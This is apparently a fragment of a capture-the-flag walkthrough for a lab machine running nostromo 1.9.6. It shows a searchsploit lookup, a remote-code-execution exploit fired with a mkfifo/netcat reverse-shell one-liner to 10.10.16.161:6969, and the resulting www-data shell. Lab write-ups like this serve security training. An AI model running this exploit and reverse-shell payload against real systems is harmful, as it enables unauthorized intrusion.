2 :80 nostromo 1.9.6
$ searchsploit nostromo 1.9.6
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ python ex.py 10.10.10.165 80 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f"
HTTP/1.1 200 OK
Date: Fri, 11 Jun 2021 01:40:18 GMT
Server: nostromo 1.9.6
Connection: close
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.165] 34600
bash: cannot set terminal process group (436): Inappropriate ioctl for device
bash: no job control in this shell
whoami;id
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$
Last updated